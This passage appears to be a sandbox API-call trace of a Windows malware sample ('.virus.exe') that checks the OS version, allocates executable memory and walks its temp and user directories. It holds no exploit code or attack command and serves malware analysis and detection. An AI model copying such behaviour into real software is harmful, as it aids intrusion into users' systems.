[0071.666] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0071.667] GetVersionExA (in: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fc78, dwMinorVersion=0x4, dwBuildNumber=0x42ed7e, dwPlatformId=0x28fca0, szCSDVersion="") | out: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.667] VirtualAlloc (lpAddress=0x32f4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x32f4000 [0071.669] GetSystemDirectoryW (in: lpBuffer=0x32f1c84, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.669] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x28fdcc*="C:\\Windows\\system32") returned 1 [0071.669] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0071.669] GetThreadLocale () returned 0x409 [0071.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.669] GetThreadLocale () returned 0x409 [0071.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x28fa90*=0x0) returned 0x14 [0071.669] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0071.670] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fcc0*="C:\\Windows\\system32\\") returned 1 [0071.670] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0071.670] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="c:\\windows\\system32\\") returned 1 [0071.670] SysReAllocStringLen (in: pbstr=0x32e25a0*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x32e25a0*="c:\\windows\\system32\\") returned 1 [0071.670] GetWindowsDirectoryW (in: lpBuffer=0x32f1c84, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0071.670] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x28fdc0*="C:\\Windows") returned 1 [0071.670] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0071.670] GetThreadLocale () returned 0x409 [0071.670] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.671] GetThreadLocale () returned 0x409 [0071.671] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x28fa90*=0x0) returned 0xb [0071.671] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0071.671] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fcc0*="C:\\Windows\\") returned 1 [0071.671] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0071.671] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fdc4*="c:\\windows\\") returned 1 [0071.671] SysReAllocStringLen (in: pbstr=0x32e259c*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x32e259c*="c:\\windows\\") returned 1 [0071.671] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0xe3bb3c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0071.671] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\D", cchLength=0x14 | out: lpsz="c:\\users\\keecfmwgj\\d") returned 0x14 [0071.671] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", nBufferLength=0x104, lpBuffer=0x28fae4, lpFilePart=0x28fae0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpFilePart=0x28fae0*="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0071.672] SysReAllocStringLen (in: pbstr=0x32e2594*=0x0, psz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x32e2594*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.672] SysReAllocStringLen (in: pbstr=0x28fdb0*=0x0, psz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.672] GetThreadLocale () returned 0x409 [0071.672] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.672] GetThreadLocale () returned 0x409 [0071.672] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.672] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpFilePart=0x28fa90*="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0071.672] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", psz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.672] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.672] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchLength=0x45 | out: lpsz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0071.672] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", psz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28fdb0*="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.672] SysReAllocStringLen (in: pbstr=0x32e2594*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", psz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x32e2594*="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0071.673] SysReAllocStringLen (in: pbstr=0x32e25a4*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x32e25a4*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] SysReAllocStringLen (in: pbstr=0x28fda4*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fda4*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] GetThreadLocale () returned 0x409 [0071.673] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\desktop\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.673] GetThreadLocale () returned 0x409 [0071.673] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\desktop\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.673] GetFullPathNameW (in: lpFileName="c:\\users\\keecfmwgj\\desktop\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="c:\\users\\keecfmwgj\\desktop\\", lpFilePart=0x28fa90*=0x0) returned 0x1b [0071.673] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\desktop\\", psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fcc0*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] CharLowerBuffW (in: lpsz="c:\\users\\keecfmwgj\\desktop\\", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\desktop\\") returned 0x1b [0071.673] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\desktop\\", psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] SysReAllocStringLen (in: pbstr=0x32e25a4*="c:\\users\\keecfmwgj\\desktop\\", psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x32e25a4*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0071.673] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x32f1c84 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0071.674] SysReAllocStringLen (in: pbstr=0x28fd9c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fd9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.674] SysReAllocStringLen (in: pbstr=0x28fda0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.674] GetThreadLocale () returned 0x409 [0071.674] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0071.674] GetThreadLocale () returned 0x409 [0071.674] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0071.674] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28fa90*=0x0) returned 0x25 [0071.674] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.674] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28f7d8*=0x0) returned 0x25 [0071.674] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0071.674] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0071.674] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.674] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.675] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0071.675] SetLastError (dwErrCode=0x0) [0071.675] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0071.675] GetLastError () returned 0x0 [0071.675] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xe3c0a4, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0xe3c0a4, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="쁌ã삤ãJ")) returned 0xffffffff [0071.675] GetLastError () returned 0x2 [0071.675] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0071.675] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0071.675] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0071.676] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0071.676] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0071.676] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.676] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0071.676] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0071.676] SetLastError (dwErrCode=0x0) [0071.676] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0071.676] GetLastError () returned 0x0 [0071.676] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28f7a8, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xe3c0fc, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0xe3c0fc, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="쁌ãﳔ(\x0b", cAlternateFileName="셔ã숄ãH")) returned 0xffffffff [0071.676] GetLastError () returned 0x2 [0071.676] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0071.676] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0071.676] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0071.677] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0071.677] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0071.677] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.677] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0071.677] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0071.677] SetLastError (dwErrCode=0x0) [0071.677] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0071.677] GetLastError () returned 0x0 [0071.677] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f4e8, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0xe3c1ac, ftLastWriteTime.dwHighDateTime=0x28f508, nFileSizeHigh=0x775d4628, nFileSizeLow=0xe3c1ac, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="셔ã塚(\x0b", cAlternateFileName="쉜ã쌌ã>")) returned 0xffffffff [0071.677] GetLastError () returned 0x2 [0071.677] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0071.678] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0071.678] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0071.678] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0071.678] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0071.678] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.678] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0071.678] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0071.678] SetLastError (dwErrCode=0x0) [0071.678] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0071.678] GetLastError () returned 0x0 [0071.679] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1d10f36, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0xe20000, nFileSizeHigh=0x40, nFileSizeLow=0xe36a20, dwReserved0=0xfffffffe, dwReserved1=0x77a93ca3, cFileName="㳎瞩ϸ", cAlternateFileName="楔ã槤ã2")) returned 0xffffffff [0071.679] GetLastError () returned 0x2 [0071.679] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0071.679] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0071.679] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0071.679] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0071.679] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0071.680] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.680] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0071.680] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0071.680] SetLastError (dwErrCode=0x0) [0071.680] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0071.680] GetLastError () returned 0x0 [0071.680] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1d10f36, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0xe20000, nFileSizeHigh=0x30, nFileSizeLow=0xe3b380, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="楔ã(@", cAlternateFileName="됴ã도ã\"")) returned 0xffffffff [0071.680] GetLastError () returned 0x2 [0071.680] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0071.680] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0071.680] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0071.681] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0071.681] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0071.681] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.681] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0071.681] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0071.681] SetLastError (dwErrCode=0x0) [0071.681] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0071.681] GetLastError () returned 0x0 [0071.681] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0xe3c760 [0071.682] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0071.682] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0071.682] FindClose (in: hFindFile=0xe3c760 | out: hFindFile=0xe3c760) returned 1 [0071.682] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0071.682] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0071.682] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0071.682] FindFirstFileW (in: 